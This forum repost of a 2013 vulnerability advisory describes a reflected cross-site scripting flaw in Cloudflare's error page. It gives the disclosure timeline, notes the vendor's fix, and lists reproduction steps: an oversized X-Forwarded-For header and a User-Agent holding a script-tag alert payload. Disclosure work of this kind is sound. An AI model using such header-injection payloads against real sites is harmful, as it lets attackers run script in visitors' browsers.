Jump to content
Matt

Cloudflare Cross Site Scripting

By Matt, in Exploituri

Recommended Posts

Matt Newbie

Matt

Posted
Posted

Description :

Cloudflare suffers from a cross site scripting vulnerability

Author : Glenn Grant

Source : Cloudflare Cross Site Scripting ? Packet Storm

Code : 

Details below of an XSS vulnerability I discovered in Cloudflare (markdown
format)

- Glenn | /dev/alias
* http://blog.devalias.net
* http://devalias.net

-----

**Reference Number:** DAHAX-2013-001 (/dev/alias/hacks 2013-001)

**Notification Timeline:**

* 10/07/2013, Request# 38713 (
https://support.cloudflare.com/anonymous_requests/new)
* 10/07/2013, Vendor looking into issue
* 16/07/2013, Updated vendor with new details (Length: 101 instead of 72)
* 16/07/2013, Vendor requested that I test again
* [No further response from vendor]
* 01/08/2013, Tested again, vulnerability fixed

**Details Published:** 14/08/2013 (
http://blog.devalias.net/post/58217238426/dahax-2013-001-cloudflare-xss-vulnerability
)

## What?

* Reflected XSS (cross site scripting) attack

## Where's Affected?

* Theoretically it seems that any page that uses cloudflare will be
affected.
  - Eg: http://www.cloudflare.com/

## How?

* **To bring up the vulnerable page**
  - Set your X-Forwarded-For header to <del>72+</del> 101+ characters
    - <del>Eg: X-Forwarded-For:
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEFFFFFFFFFFGGGGGGGGGGHH</del>
    - Eg: <pre>X-Forwarded-For:
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEFFFFFFFFFFGGGGGGGGGGHHHHHHHHHHIIIIIIIIIIJJJJJJJJJJK</pre>
  - Load a site using cloudflare
  - You should end up on "DNS Points to Prohibited IP" page

* **To trigger the XSS**
  - Set your User-Agent string to the XSS attack
    - Eg: <pre>User-Agent: USER-AGENT being tested for
XSS..<script>alert('Vulnerable to XSS via USER-AGENT header [Found by
devalias.net]')</script></pre>

* **The whole attack**
  - Ensure your X-Forwarded-For and User-Agent headers are configured as
above
  - Navigate to a page using cloudflare
  - ???
  - Profit!

## Who?

* Discovered by [Glenn '/dev/alias' Grant](http://www.devalias.net/) (
glenn@devalias.net)

## Responsible Disclosure Notice

* Following in the footsteps of Google's vulnerability disclosure timeline,
unless otherwise agreed to beforehand, I reserve the right to publicly
announce the details of any discovered vulnerabilities 7 days post
notification.
  * **Google's Rationale:** "Seven days is an aggressive timeline and may
be too short for some vendors to update their products, but it should be
enough time to publish advice about possible mitigations, such as
temporarily disabling a service, restricting access, or contacting the
vendor for more information. As a result, after 7 days have elapsed without
a patch or advisory, we will support researchers making details available
so that users can take steps to protect themselves. By holding ourselves to
the same standard, we hope to improve both the state of web security and
the coordination of vulnerability management." - [Google](
http://googleonlinesecurity.blogspot.com.au/2013/05/disclosure-timeline-for-vulnerabilities.html

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...